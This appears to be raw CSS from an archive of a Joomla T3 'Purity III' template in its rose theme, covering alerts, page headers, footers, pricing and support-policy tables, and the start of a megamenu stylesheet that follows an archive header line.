  border-color: #ebccd1;
  color: #b94a48;
}
.alert-error hr {
  border-top-color: #e4b9c0;
}
.alert-error .alert-link {
  color: #953b39;
}
.alert-error .alert-message {
  background: transparent;
  color: inherit;
}
.tip-wrap {
  background: #fff6df;
  border: 1px solid #fb3;
  border-radius: 5px;
  -webkit-box-shadow: none;
  box-shadow: none;
  max-width: 300px;
  z-index: 999;
}
.tip-title {
  border-bottom: 1px solid #fb3;
  font-weight: bold;
  padding: 5px 10px;
}
.tip-text {
  font-size: 14px;
  margin: 0;
  padding: 5px 10px;
}
.hasTip img {
  border: none;
  margin: 0 5px 0 0;
}
@media (min-width: 768px) {
  .languageswitcherload {
    float: right;
    width: 100%;
  }
  .languageswitcherload .mod-languages {
    text-align: right;
  }
}
div.calendar {
  width: 187px;
}
dl.tabs {
  border-bottom: 1px solid #d9d9d9;
  display: block;
  clear: both;
  margin-bottom: 0;
}
dl.tabs:before,
dl.tabs:after {
  content: " ";
  display: table;
}
dl.tabs:after {
  clear: both;
}
dl.tabs dt.tabs {
  border: 1px solid #d9d9d9;
  display: inline-block;
  padding: 10px 20px;
  margin-right: 5px;
  margin-bottom: -1px;
}
dl.tabs dt.tabs h3 {
  margin: 0;
  font-size: 14px;
}
dl.tabs dt.tabs h3 a {
  color: #444444;
  outline: none;
}
dl.tabs dt.tabs h3 a:hover,
dl.tabs dt.tabs h3 a:focus,
dl.tabs dt.tabs h3 a:active {
  color: #8f0072;
  text-decoration: none;
}
dl.tabs dt.tabs.open {
  border-bottom-color: #ffffff;
}
dl.tabs dt.tabs.open a {
  font-weight: bold;
}
.iframe-bordered {
  border: 1px solid #dddddd;
}
.chzn-container {
  display: inline-block;
  vertical-align: middle;
}
.chzn-container-single .chzn-single,
.chzn-container-multi .chzn-choices .search-field input,
.chzn-container-single .chzn-search input {
  height: 26px;
}
.chzn-container-single .chzn-drop,
.chzn-container .chzn-drop {
  -webkit-box-sizing: content-box !important;
  -moz-box-sizing: content-box !important;
  box-sizing: content-box !important;
}
.input-prepend .chzn-container-single .chzn-single {
  border-color: #cccccc;
  height: 26px;
  border-radius: 0 3px 3px 0;
  -webkit-box-shadow: none;
  box-shadow: none;
}
.input-prepend .chzn-container-active .chzn-single-with-drop {
  border-radius: 0 3px 0 0;
}
.input-prepend .chzn-container-single .chzn-drop {
  border-color: #cccccc;
}
.btn-group .chzn-results {
  white-space: normal;
}

.page-header {
  padding-bottom: 20px;
  margin: 0 0 20px;
  border-bottom: 1px solid #eeeeee;
}
.page-title,
.page-header h1 {
  line-height: 1;
  margin: 0;
}
.page-subheader {
  border-bottom: 1px solid #eeeeee;
  margin: 0 0 20px;
  padding-bottom: 20px;
}
.page-subheader:before,
.page-subheader:after {
  content: " ";
  display: table;
}
.page-subheader:after {
  clear: both;
}
.page-subtitle,
.page-subheader h2 {
  line-height: 1;
  margin: 0;
}
.page-header + .page-subheader {
  margin-top: -20px;
}
.article-title h1 a:hover,
.article-header h1 a:hover,
.article-title h2 a:hover,
.article-header h2 a:hover,
.article-title h1 a:active,
.article-header h1 a:active,
.article-title h2 a:active,
.article-header h2 a:active,
.article-title h1 a:focus,
.article-header h1 a:focus,
.article-title h2 a:focus,
.article-header h2 a:focus {
  text-decoration: none;
}
.article-title,
.article-header h1 {
  margin: 0 0 20px 0;
}
@media screen and (max-width: 767px) {
  .article-title,
  .article-header h1 {
    font-size: 24px;
  }
}
@media screen and (max-width: 767px) {
  h2.article-title,
  .article-header h2 {
    font-size: 24px;
  }
}
.item-title {
  font-weight: bold;
}
.jumbotron:before,
.jumbotron:after {
  content: " ";
  display: table;
}
.jumbotron:after {
  clear: both;
}
.jumbotron h1,
.jumbotron h2,
.jumbotron h3 {
  margin-top: 0;
}
.jumbotron p {
  color: #666666;
}
.jumbotron p:last-child {
  margin-bottom: 0;
}
.container .jumbotron {
  border-radius: 0px;
}
.jumbotron .btn {
  margin-top: 20px;
  margin-bottom: 20px;
}
.masthead {
  padding-top: 40px;
  padding-bottom: 40px;
  text-align: center;
}
.masthead p:last-child {
  margin-bottom: 0;
}
@media screen and (min-width: 992px) {
  .masthead {
    padding-top: 80px;
    padding-bottom: 80px;
  }
  .masthead h1 {
    font-size: 84px;
  }
  .masthead p {
    font-size: 28px;
  }
  .masthead .btn-lg {
    padding: 15px 40px;
    font-size: 24px;
  }
}
.jumbotron-primary {
  background-color: #db00af;
}
.jumbotron-primary h1,
.jumbotron-primary h2,
.jumbotron-primary h3 {
  color: #ffffff;
}
.jumbotron-primary p {
  color: #ffdbf8;
}
.jumbotron-primary .btn-primary {
  border-color: #fff;
}
.page-masthead:before,
.page-masthead:after {
  content: " ";
  display: table;
}
.page-masthead:after {
  clear: both;
}
.page-masthead .jumbotron {
  margin-top: 0 !important;
  margin-bottom: 0 !important;
  padding-top: 60px;
  padding-bottom: 60px;
  padding-left: 0;
  padding-right: 0;
}
@media screen and (max-width: 992px) {
  .page-masthead .jumbotron {
    padding-top: 40px;
    padding-bottom: 40px;
  }
  .page-masthead .jumbotron .container {
    padding: 0;
  }
}
@media screen and (max-width: 767px) {
  .page-masthead .jumbotron {
    padding-left: 20px;
  }
}
.label {
  border-radius: 0px;
}
.label:empty {
  display: none;
}
.badge:empty {
  display: none;
}
.btn .badge {
  position: relative;
  top: -1px;
}
.page-header .label,
.page-header .badge {
  vertical-align: middle;
}
.thumbnail {
  padding: 0;
  margin-bottom: 40px;
}
.alert h4 {
  color: inherit;
}
.media:first-child {
  margin-top: 0;
}
.media-object {
  display: block;
}
.media-heading {
  margin: 0 0 5px;
}
.media > .pull-left {
  margin-right: 10px;
}
.media > .pull-right {
  margin-left: 10px;
}
.list-group-item > .badge {
  float: right;
}
.list-group-item > .badge + .badge {
  margin-right: 5px;
}
a.list-group-item.active .list-group-item-heading,
a.list-group-item.active:hover .list-group-item-heading,
a.list-group-item.active:focus .list-group-item-heading {
  color: inherit;
}
a.list-group-item.active .list-group-item-text,
a.list-group-item.active:hover .list-group-item-text,
a.list-group-item.active:focus .list-group-item-text {
  color: #ffa8ee;
}
.panel-heading > .dropdown .dropdown-toggle {
  color: inherit;
}
.panel-title > a {
  color: inherit;
}
.modal-backdrop.fade {
  opacity: 0;
  filter: alpha(opacity=0);
}
.modal-backdrop.in {
  opacity: 0.5;
  filter: alpha(opacity=50);
}
.modal-header {
  border-bottom: 0;
  padding: 20px 40px 0;
}
.modal-title {
  font-size: 35px;
}
.modal-body {
  padding: 10px 40px 20px;
}
@media screen and (min-width: 768px) {
  .modal-dialog {
    width: 600px;
    margin: 30px auto;
  }
  .modal-content {
    -webkit-box-shadow: 0 5px 15px rgba(0, 0, 0, 0.5);
    box-shadow: 0 5px 15px rgba(0, 0, 0, 0.5);
  }
}

.logo {
  position: absolute;
  top: 0;
  left: 0;
  padding: 0;
  margin: 0;
}
.logo a {
  background: transparent;
  color: #fff;
  text-decoration: none;
  display: inline-block;
  line-height: 1;
  margin: 0;
}
.logo:hover a,
.logo a:hover,
.logo a:active,
.logo a:focus {
  background: #c2009b;
  color: #ffffff;
  text-decoration: none;
}
@media screen and (min-width: 991px) {
  .logo {
    position: static;
  }
  .logo a {
    background: #c2009b;
  }
  .logo:hover a,
  .logo a:hover,
  .logo a:active,
  .logo a:focus {
    color: #ffffff;
  }
}
.off-canvas-toggle + .container .navbar-header .logo {
  left: 55px;
  border-left: 1px solid #c2009b;
}
@media screen and (min-width: 991px) {
  .off-canvas-toggle + .container .navbar-header .logo {
    border-left: 0;
  }
}
.logo-image > a {
  max-width: 160px;
  max-height: 55px;
}
.logo-image > a > img {
  max-width: 100%;
}
.logo-image span,
.logo-image small {
  display: none;
}
.logo-text {
  text-transform: uppercase;
  font-size: 18px;
}
.logo-text a {
  line-height: 55px;
  padding: 0 20px;
}
.logo-text .site-slogan {
  display: none;
}
.head-search {
  height: 55px;
  position: absolute;
  right: 0;
  margin: 0;
  z-index: 1000;
}
.head-search form {
  margin: 0;
}
.head-search label {
  display: none;
}
.head-search .search {
  background: #db00af;
  border-left: 1px solid #c2009b;
  border-right: 1px solid #c2009b;
  position: relative;
}
@media screen and (min-width: 991px) {
  .head-search .search {
    background: #c2009b;
  }
}
.head-search .search .fa-search {
  color: #ffdbf8;
  content: "\f002";
  display: block;
  font-family: "FontAwesome";
  position: absolute;
  left: 20px;
  top: 19px;
  z-index: 1;
}
.head-search .search .fa-search:hover {
  z-index: 0;
}
.head-search .form-control {
  border: 0;
  background: transparent;
  color: #ffdbf8;
  height: 54px;
  line-height: 35px;
  position: relative;
  margin: 0;
  padding: 10px 15px 10px 40px;
  width: 0;
  -webkit-transition: width 0.2s;
  -o-transition: width 0.2s;
  transition: width 0.2s;
}
@media screen and (min-width: 991px) {
  .head-search .form-control {
    height: 55px;
  }
}
.head-search .form-control:hover,
.head-search .form-control:active,
.head-search .form-control:focus {
  color: #ffffff;
  box-shadow: none;
}
.head-search .form-control:active,
.head-search .form-control:focus {
  width: 180px;
}
.head-search .form-control:-webkit-autofill {
  -webkit-box-shadow: 0 0 0 1000px #0067a2 inset;
  -webkit-text-fill-color: #ffffff;
}
.head-search .form-control::-moz-placeholder {
  color: #ffffff;
}
.navbar-toggle + .head-search {
  right: 55px;
  max-width: 57px;
}
@media screen and (max-width: 990px) {
  .navbar-toggle + .head-search {
    max-width: inherit;
  }
  .navbar-toggle + .head-search:hover,
  .navbar-toggle + .head-search:focus,
  .navbar-toggle + .head-search:active {
    max-width: none;
  }
  .navbar-toggle + .head-search:hover .form-control,
  .navbar-toggle + .head-search:focus .form-control,
  .navbar-toggle + .head-search:active .form-control {
    width: 180px;
  }
}
@media screen and (min-width: 991px) {
  .head-search,
  .navbar-toggle + .head-search {
    right: 15px;
    top: 0;
    max-width: none;
  }
}
.nav .open > a,
.nav .open > a:hover,
.nav .open > a:focus {
  color: #ffffff;
  background: transparent;
}
.chzn-container-multi .chzn-choices li.search-field input[type="text"] {
  height: 30px;
}
.chzn-container {
  max-width: 100%;
}
.chzn-container .chzn-single {
  max-width: 260px;
}
.ie8 .radio.t3onoff {
  border: 0;
}
.ie8 label.on,
.ie8 label.off {
  border: 1px solid #eeeeee;
}
.pagination > li > a,
.pagination > li > span {
  margin-bottom: 10px;
}
#eblog-wrapper {
  line-height: 1.625;
}
.com_weblinks .weblink-categories .page-header.item-title .btn {
  padding: 5px;
}
.com_weblinks .weblink-categories .page-header.item-title .btn .fa-minus {
  display: block;
}
.com_weblinks .weblink-categories .page-header.item-title .btn .fa-plus {
  display: none;
}
.com_weblinks .weblink-categories .page-header.item-title .btn.collapsed .fa-minus {
  display: none;
}
.com_weblinks .weblink-categories .page-header.item-title .btn.collapsed .fa-plus {
  display: block;
}
.t3-sl {
  padding-bottom: 40px;
  padding-top: 40px;
}
.t3-sl .t3-module {
  margin-bottom: 0;
}
.t3-sl .t3-module + .t3-module {
  margin-top: 20px;
}
@media screen and (min-width: 768px) {
  .t3-sl {
    padding-bottom: 60px;
    padding-top: 60px;
  }
}
.t3-sl-1 {
  border-bottom: 1px solid #eeeeee;
}
.t3-mainbody {
  padding-top: 20px;
  padding-bottom: 20px;
}
.t3-content {
  padding-top: 20px;
  padding-bottom: 20px;
}
.t3-sidebar {
  padding-top: 20px;
  padding-bottom: 20px;
}
.t3-footer {
  background: #f7f7f7;
  color: #666666;
}
.t3-footer:before,
.t3-footer:after {
  content: " ";
  display: table;
}
.t3-footer:after {
  clear: both;
}
.t3-footer small {
  display: block;
  font-size: 100%;
}
.t3-footer-sl {
  padding: 20px 0;
}
.t3-footer-sl:before,
.t3-footer-sl:after {
  content: " ";
  display: table;
}
.t3-footer-sl:after {
  clear: both;
}
@media screen and (min-width: 768px) {
  .t3-footer-sl {
    padding: 40px 0;
  }
}
.t3-footer-sl .t3-module {
  background: #f7f7f7;
  color: #666666;
  margin-top: 10px;
  margin-bottom: 10px;
}
.t3-footer-sl .t3-module .module-title {
  color: #444444;
  font-size: 18px;
  margin-bottom: 10px;
}
.t3-footer-sl .t3-module ul {
  list-style: none;
  margin-left: 0;
  margin-bottom: 0;
  padding-left: 0;
}
.t3-footer-sl .t3-module ul > li {
  line-height: 24px;
}
.t3-footer-sl .t3-module ul > li > a {
  color: #666666;
}
.t3-footer-sl .t3-module ul > li > a:hover,
.t3-footer-sl .t3-module ul > li > a:active,
.t3-footer-sl .t3-module ul > li > a:focus {
  color: #666666;
}
#back-to-top {
  z-index: 999;
  position: fixed;
  right: 20px;
  top: auto;
}
#back-to-top.affix {
  bottom: 40px;
}
#back-to-top a {
  outline: none;
}
#back-to-top i {
  font-size: 28px;
}
.t3-copyright {
  border-top: 1px solid #eeeeee;
  font-size: 12px;
  padding: 40px 0 80px;
}
.t3-copyright:before,
.t3-copyright:after {
  content: " ";
  display: table;
}
.t3-copyright:after {
  clear: both;
}
.t3-copyright small {
  margin-bottom: 5px;
}
.copyright {
  margin-bottom: 20px;
}
.poweredby:before,
.poweredby:after {
  content: " ";
  display: table;
}
.poweredby:after {
  clear: both;
}
@media screen and (min-width: 991px) {
  .poweredby {
    text-align: right;
  }
}
.poweredby .t3-logo,
.poweredby .t3-logo-small {
  display: inline-block;
}
.mod-preview-info {
  z-index: 2000;
}
#ezblog-body .blog-text p,
#ezblog-body .blog-text li {
  line-height: 1.625;
}
.features-intro .t3-content {
  padding-top: 0;
  padding-bottom: 0;
}
.row-feature {
  border-top: 1px solid #eeeeee;
  padding: 40px 0;
  font-size: 16px;
  color: #666666;
  line-height: 1.5;
}
.page-masthead .row-feature {
  padding: 40px 0;
}
@media screen and (min-width: 992px) {
  .row-feature {
    padding: 60px 0;
  }
  .page-masthead .row-feature {
    padding: 100px 0;
  }
}
.row-feature h1,
.row-feature h2,
.row-feature h3 {
  line-height: 1.15;
  color: #444444;
}
.row-feature h1 {
  margin-top: 0;
  margin-bottom: 60px;
  font-weight: 300;
}
@media screen and (min-width: 768px) {
  .row-feature h1 {
    font-size: 84px;
  }
}
.row-feature h1 + p {
  margin-top: -55px;
}
.row-feature h2 {
  margin-top: 0;
  margin-bottom: 10px;
}
@media screen and (min-width: 768px) {
  .row-feature h2 {
    font-size: 42px;
  }
}
.row-feature h3 {
  margin-top: 20px;
  margin-bottom: 20px;
}
@media screen and (min-width: 768px) {
  .row-feature h3 {
    font-size: 27.6px;
  }
}
.row-feature h3 + p {
  margin-top: -10px;
}
.row-feature .feature-ct {
  width: 100%;
  padding-top: 10px;
}
@media screen and (min-width: 768px) {
  .row-feature .pull-left.item-image + .feature-ct {
    width: 50%;
    float: right;
    padding-left: 20px;
  }
  .row-feature .pull-right.item-image + .feature-ct {
    width: 50%;
    float: left;
    padding-right: 20px;
  }
}
.row-feature.text-center {
  text-align: center;
}
.row-feature.row-feature-alt,
.row-feature:nth-child(even) {
  background: #f7f7f7;
}
.row-feature.row-feature-primary {
  background: #db00af;
  color: #ffdbf8;
}
.row-feature.row-feature-primary h1,
.row-feature.row-feature-primary h2,
.row-feature.row-feature-primary h3 {
  color: #ffffff;
}
.row-feature.row-feature-primary .feature-ct,
.row-feature.row-feature-primary p {
  color: #ffdbf8;
}
.row-feature.row-feature-primary .btn-primary {
  border-color: #fff;
}
.row-feature.row-feature-primary + .row-feature-primary {
  border-top: 1px solid #a80086;
}
.row-feature .row-feature-narrow {
  padding-top: 20px;
  padding-bottom: 20px;
}
.row-feature:first-child {
  border-top: 0;
}
.row-feature .item-image {
  width: 100%;
  float: none;
  margin-bottom: 20px;
}
.row-feature .item-image img {
  max-width: 100%;
}
@media screen and (min-width: 768px) {
  .row-feature .pull-left.item-image,
  .row-feature .pull-right.item-image {
    max-width: 50%;
    min-width: 25%;
    margin-bottom: 0;
  }
  .row-feature .pull-left.item-image {
    float: left;
    text-align: left;
    padding-right: 20px;
  }
  .row-feature .pull-right.item-image {
    float: right;
    text-align: right;
    padding-left: 20px;
  }
}
.row-feature .page-header {
  border: 0;
  margin: 0 0 20px;
  padding: 0;
}
.row-feature .jumbotron {
  background: transparent;
  position: relative;
  margin-top: 0;
  margin-bottom: 20px;
  padding-top: 0;
  padding-bottom: 0;
  text-align: center;
}
@media screen and (min-width: 768px) {
  .row-feature .jumbotron {
    margin-bottom: 60px;
  }
}
.row-feature .gallery .thumbnail {
  border: 0;
  padding: 0;
}
.row-feature .gallery .thumbnail a {
  display: block;
  border: 1px solid #eeeeee;
  padding: 3px;
  -webkit-transition: border-color 0.2s ease-in;
  -o-transition: border-color 0.2s ease-in;
  transition: border-color 0.2s ease-in;
}
.row-feature .gallery .thumbnail a img {
  width: 100%;
  padding: 0;
}
.row-feature .gallery .thumbnail a:hover,
.row-feature .gallery .thumbnail a:focus,
.row-feature .gallery .thumbnail a:active {
  border-color: #bbbbbb;
}
.row-feature .gallery .thumbnail a:hover img,
.row-feature .gallery .thumbnail a:focus img,
.row-feature .gallery .thumbnail a:active img {
  opacity: .7;
}
.support-policy .row-support-policy {
  margin-bottom: 20px;
}
.support-policy .policy-item {
  margin-bottom: 20px;
  border: 1px solid #eeeeee;
}
.support-policy .policy-item .col-type {
  position: relative;
  height: 100px;
  border-bottom: 1px solid #eeeeee;
  background: #f7f7f7;
}
.support-policy .policy-item .col-type h3 {
  position: absolute;
  bottom: 10px;
  left: 20px;
}
.support-policy .policy-item .col-detail {
  height: 200px;
  padding: 20px;
}
.support-policy .policy-item .col-level {
  height: 80px;
  background: #444444;
  color: #fff;
  position: relative;
}
.support-policy .policy-item .col-level .face,
.support-policy .policy-item .col-level .count-up,
.support-policy .policy-item .col-level > strong {
  height: 80px;
  line-height: 80px;
}
.support-policy .policy-item .col-level .level-info {
  width: 160px;
  position: absolute;
  left: 0;
  bottom: 0;
}
.support-policy .policy-item .col-level .level-info .face {
  background-image: url(../../../../images/emoticons.png);
  background-repeat: no-repeat;
  background-color: rgba(0, 0, 0, 0.35);
  display: table-cell;
  width: 80px;
  border-right: 1px solid rgba(0, 0, 0, 0.2);
}
.support-policy .policy-item .col-level .level-info .count-up {
  width: 80px;
  border-right: 1px solid rgba(0, 0, 0, 0.2);
  background-color: rgba(0, 0, 0, 0.15);
  display: table-cell;
  vertical-align: middle;
  text-align: center;
  font-size: 18px;
  font-weight: bold;
}
.support-policy .policy-item .col-level strong {
  width: 100%;
  color: #ffffff;
  display: block;
  float: left;
  font-weight: bold;
  padding-left: 180px;
  font-size: 18px;
}
.support-policy .policy-item .col-level.level-1 strong {
  background: #3e9b52;
}
.support-policy .policy-item .col-level.level-1 .face {
  background-position: 0px 0px;
}
.support-policy .policy-item .col-level.level-2 strong {
  background: #2f773f;
}
.support-policy .policy-item .col-level.level-2 .face {
  background-position: 0px -80px;
}
.support-policy .policy-item .col-level.level-3 strong {
  background: #ffcc00;
}
.support-policy .policy-item .col-level.level-3 .face {
  background-position: 0px -160px;
}
.support-policy .policy-item .col-level.level-4 strong {
  background: #cca300;
}
.support-policy .policy-item .col-level.level-4 .face {
  background-position: 0px -240px;
}
.support-policy .policy-item .col-level.level-5 strong {
  background-color: #ff8800;
}
.support-policy .policy-item .col-level.level-5 .face {
  background-position: 0px -320px;
}
.support-policy .policy-item .col-level.level-6 strong {
  background: #cc0000;
}
.support-policy .policy-item .col-level.level-6 .face {
  background-position: 0px -400px;
}
.support-policy:hover {
  background: #ffffff;
  border-color: #eeeeee;
}
.support-policy:hover .level-info .face {
  top: -70px;
}
.support-policy:hover .level-info .count-up {
  bottom: 0;
}
.support-policy.style2 {
  margin-bottom: 60px;
}
.support-policy .row-heading {
  background: #444444;
  color: #ffffff;
  overflow: hidden;
}
@media screen and (min-width: 768px) {
  .support-policy .row-heading {
    display: table;
    width: 100%;
  }
}
.support-policy .row-heading > div {
  border-right: 1px solid #5e5e5e;
  font-size: 12px;
  font-weight: bold;
  padding: 20px;
}
@media screen and (min-width: 768px) {
  .support-policy .row-heading > div {
    font-size: 15px;
    display: table-cell;
  }
}
.support-policy .row-body {
  border-left: 1px solid #eeeeee;
  margin-bottom: 20px;
}
@media screen and (min-width: 768px) {
  .support-policy .row-body {
    display: table;
    width: 100%;
    margin-bottom: 0;
  }
}
.support-policy .row-body > div {
  border-right: 1px solid #eeeeee;
  border-bottom: 1px solid #eeeeee;
  padding: 10px 20px;
  vertical-align: middle;
}
@media screen and (min-width: 768px) {
  .support-policy .row-body > div {
    display: table-cell;
    float: none;
  }
}
.support-policy .row-body .col-type {
  background: #444444;
  color: #ffffff;
  font-size: 16px;
  font-weight: bold;
}
@media screen and (min-width: 768px) {
  .support-policy .row-body .col-type {
    background: transparent;
    color: #444444;
  }
}
.support-policy .row-body .col-level {
  font-size: 32px;
  text-align: center;
}
.support-policy .row-body .col-status {
  border-bottom: 0;
}
.support-policy .row-body .col-status .face {
  background-image: url(../../../../images/emoticons.png);
  background-repeat: no-repeat;
  display: block;
  height: 80px;
  margin: 0 auto;
  width: 80px;
}
.support-policy .row-body .col-status strong {
  color: #ffffff;
  display: block;
  padding: 3px 0;
  text-align: center;
}
.support-policy .row-body.level-1 .col-status {
  background: #3e9b52;
}
.support-policy .row-body.level-1 .col-status .face {
  background-position: 0px 0px;
}
.support-policy .row-body.level-2 .col-status {
  background: #44aa5a;
}
.support-policy .row-body.level-2 .col-status .face {
  background-position: 0px -80px;
}
.support-policy .row-body.level-3 .col-status {
  background: #4bb762;
}
.support-policy .row-body.level-3 .col-status .face {
  background-position: 0px -160px;
}
.support-policy .row-body.level-4 .col-status {
  background: #59bd6f;
}
.support-policy .row-body.level-4 .col-status .face {
  background-position: 0px -240px;
}
.support-policy .row-body.level-5 .col-status {
  background: #68c37b;
}
.support-policy .row-body.level-5 .col-status .face {
  background-position: 0px -320px;
}
.support-policy .row-body.level-6 .col-status {
  background: #77c888;
}
.support-policy .row-body.level-6 .col-status .face {
  background-position: 0px -400px;
}
.support-policy .row-alt {
  background: #f7f7f7;
}
.support-policy .support-yes {
  color: #3e9b52;
}
.support-policy .support-no {
  color: #e1e1e1;
}
.pricing-table {
  padding-top: 40px;
  padding-bottom: 100px;
}
.pricing-table .col {
  margin-bottom: 40px;
}
@media (min-width: 992px) {
  .pricing-table .col {
    margin-bottom: 0;
  }
}
@media (min-width: 768px) {
  .pricing-table .col.no-padding {
    padding: 0;
  }
}
@media (min-width: 768px) {
  .pricing-table .col.shadow {
    box-shadow: 0 0 0 5px rgba(0, 0, 0, 0.2);
  }
}
.pricing-table .col .big-number {
  display: inline-block;
  font-size: 70px;
}
.pricing-table .col .big-number sup {
  font-size: 28px;
  top: -1em;
}
.pricing-table .col .btn {
  font-size: 20px;
  padding: 10px 20px;
}
.pricing-table .col .col-header {
  background: #666666;
  color: #ffffff;
  padding: 10px 20px;
}
.pricing-table .col ul {
  border: 1px solid #eeeeee;
  border-bottom: 0;
  list-style: none;
  margin: 0;
  padding: 0;
}
.pricing-table .col ul li {
  border-bottom: 1px solid #eeeeee;
  font-size: 16px;
  padding: 10px 20px;
  text-align: center;
}
.pricing-table .col ul li.row1 {
  background: #f7f7f7;
}
.pricing-table .col ul li i {
  color: #3e9b52;
  font-size: 18px;
}
.pricing-table .col ul li.no i {
  color: #cc0000;
}
.pricing-table .col ul li.no {
  color: #999999;
  text-decoration: line-through;
}
.pricing-table .col .col-footer {
  background: #eeeeee;
  border: 1px solid #d5d5d5;
  padding: 20px;
}
.pricing-table .col-feature {
  z-index: 200;
}
@media screen and (min-width: 992px) {
  .pricing-table .col-feature {
    margin-top: -20px;
  }
}
.pricing-table .col-feature .col-header {
  background: #db00af;
  padding: 20px 20px;
}
.pricing-table.style2 .col:first-child .col-header {
  border-radius: 5px 0 0 0;
}
.pricing-table.style2 .col:first-child .col-footer {
  border-radius: 0 0 0 5px;
}
.pricing-table.style2 .col:last-child .col-header {
  border-radius: 0 5px 0 0;
}
.pricing-table.style2 .col:last-child .col-footer {
  border-radius: 0 0 5px 0;
}
.pricing-table.style2 .col-feature {
  border-radius: 5px;
}
.pricing-table.style2 .col-feature .col-header {
  border-radius: 5px 5px 0 0;
}
.pricing-table.style2 .col-feature .col-footer {
  border-radius: 0 0 5px 5px;
}
.our-team .lead {
  margin-bottom: 60px;
}
.our-team .thumbnail {
  text-align: center;
  border: 0;
  padding: 0 20px;
}
.our-team .thumbnail .caption {
  padding-bottom: 20px;
}
.our-team .thumbnail h3 {
  margin-bottom: 5px;
}
.our-team .thumbnail .btn {
  border-radius: 50%;
  height: 32px;
  line-height: 32px;
  margin: 0 2px;
  padding: 0;
  text-align: center;
  width: 32px;
}
.our-team .thumbnail .btn:hover {
  background: #db00af;
  border-color: #db00af;
  color: #ffffff;
}
.control-group .controls script + .row-fluid {
  margin-left: 0;
}
.control-group .controls script + .row-fluid + .row-fluid {
  margin-left: 0;
}
.video-wrapper {
  position: relative;
  padding-bottom: 51%;
  padding-top: 30px;
  height: 0;
}
.video-wrapper iframe {
  position: absolute;
  top: 0;
  left: 0;
  width: 100%;
  height: 100%;
}PKԜ�\�jZp7p7-purity_iii/local/css/themes/rose/megamenu.cssnu&1i�.t3-megamenu .mega-inner:before,
.t3-megamenu .mega-inner:after {
  content: " ";
  display: table;
}
.t3-megamenu .mega-inner:after {
  clear: both;
}
.t3-megamenu .mega > .mega-dropdown-menu {
  min-width: 200px;
  display: none;
}
.t3-megamenu .mega.open > .mega-dropdown-menu,
.t3-megamenu .mega.dropdown-submenu.open > .mega-dropdown-menu {
  display: block;
}
.t3-megamenu .mega-group:before,
.t3-megamenu .mega-group:after {
  content: " ";
  display: table;
}
.t3-megamenu .mega-group:after {
  clear: both;
}
.t3-megamenu .dropdown-header,
.t3-megamenu .mega-nav .mega-group > .dropdown-header,
.t3-megamenu .dropdown-menu .mega-nav .mega-group > .dropdown-header,
.t3-megamenu .dropdown-menu .active .mega-nav .mega-group > .dropdown-header {
  margin: 0;
  padding: 0;
  background: transparent;
  color: inherit;
  font-size: 18px;
  line-height: normal;
}
.t3-megamenu .dropdown-header:hover,
.t3-megamenu .mega-nav .mega-group > .dropdown-header:hover,
.t3-megamenu .dropdown-menu .mega-nav .mega-group > .dropdown-header:hover,
.t3-megamenu .dropdown-menu .active .mega-nav .mega-group > .dropdown-header:hover,
.t3-megamenu .dropdown-header:active,
.t3-megamenu .mega-nav .mega-group > .dropdown-header:active,
.t3-megamenu .dropdown-menu .mega-nav .mega-group > .dropdown-header:active,
.t3-megamenu .dropdown-menu .active .mega-nav .mega-group > .dropdown-header:active,
.t3-megamenu .dropdown-header:focus,
.t3-megamenu .mega-nav .mega-group > .dropdown-header:focus,
.t3-megamenu .dropdown-menu .mega-nav .mega-group > .dropdown-header:focus,
.t3-megamenu .dropdown-menu .active .mega-nav .mega-group > .dropdown-header:focus {
  background: inherit;
  color: inherit;
}
.t3-megamenu .mega-group-ct {
  margin: 0;
  padding: 0;
}
.t3-megamenu .mega-group-ct:before,
.t3-megamenu .mega-group-ct:after {
  content: " ";
  display: table;
}
.t3-megamenu .mega-group-ct:after {
  clear: both;
}
.t3-megamenu .mega-nav,
.t3-megamenu .dropdown-menu .mega-nav {
  margin: 0;
  padding: 0;
  list-style: none;
}
.t3-megamenu .mega-nav > li,
.t3-megamenu .dropdown-menu .mega-nav > li {
  list-style: none;
  margin-left: 0;
}
.t3-megamenu .mega-nav > li a,
.t3-megamenu .dropdown-menu .mega-nav > li a {
  white-space: normal;
  display: block;
  padding: 5px;
}
.t3-megamenu .mega-nav > li a:hover,
.t3-megamenu .dropdown-menu .mega-nav > li a:hover,
.t3-megamenu .mega-nav > li a:focus,
.t3-megamenu .dropdown-menu .mega-nav > li a:focus {
  text-decoration: none;
  color: #ffffff;
  background-color: #515151;
}
.t3-megamenu .mega-nav > li .separator {
  display: block;
  padding: 5px;
}
.t3-megamenu .mega-group > .mega-nav,
.t3-megamenu .dropdown-menu .mega-group > .mega-nav {
  margin-left: -5px;
  margin-right: -5px;
}
.t3-megamenu .mega-nav .dropdown-submenu > a::after {
  margin-right: 5px;
}
.t3-megamenu .t3-module {
  margin-bottom: 10px;
}
.t3-megamenu .t3-module .module-title {
  margin: 0;
  padding: 0;
  background: transparent;
  color: inherit;
  font-size: 18px;
  line-height: normal;
  margin-bottom: 5px;
}
.t3-megamenu .t3-module .module-title:hover,
.t3-megamenu .t3-module .module-title:active,
.t3-megamenu .t3-module .module-title:focus {
  background: inherit;
  color: inherit;
}
.t3-megamenu .t3-module .module-ct {
  margin: 0;
  padding: 0;
}
.t3-megamenu .mega-caption {
  display: block;
  white-space: nowrap;
}
.t3-megamenu .nav .caret,
.t3-megamenu .dropdown-submenu .caret,
.t3-megamenu .mega-menu .caret {
  display: none;
}
.t3-megamenu .nav > .dropdown > .dropdown-toggle .caret {
  display: inline-block;
}
.t3-megamenu .nav [class^="icon-"],
.t3-megamenu .nav [class*=" icon-"],
.t3-megamenu .nav .fa {
  margin-right: 5px;
}
.t3-megamenu .nav .input-group-addon [class^="icon-"],
.t3-megamenu .nav .input-group-addon [class*=" icon-"],
.t3-megamenu .nav .input-group-addon .fa {
  margin-right: 0;
}
.t3-megamenu .mega-align-left > .dropdown-menu {
  left: 0;
}
.t3-megamenu .mega-align-right > .dropdown-menu {
  left: auto;
  right: 0;
}
.t3-megamenu .mega-align-center > .dropdown-menu {
  left: 50%;
  -webkit-transform: translate(-50%, 0);
  -ms-transform: translate(-50%, 0);
  -o-transform: translate(-50%, 0);
  transform: translate(-50%, 0);
}
.t3-megamenu .dropdown-submenu.mega-align-left > .dropdown-menu {
  left: 100%;
}
.t3-megamenu .dropdown-submenu.mega-align-right > .dropdown-menu {
  left: auto;
  right: 100%;
}
.t3-megamenu .mega-align-justify {
  position: static;
}
.t3-megamenu .mega-align-justify > .dropdown-menu {
  left: 0;
  margin-left: 0;
  top: auto;
}
.t3-megamenu .mega-tab > div {
  position: relative;
}
.t3-megamenu .mega-tab > div > ul {
  width: 200px;
}
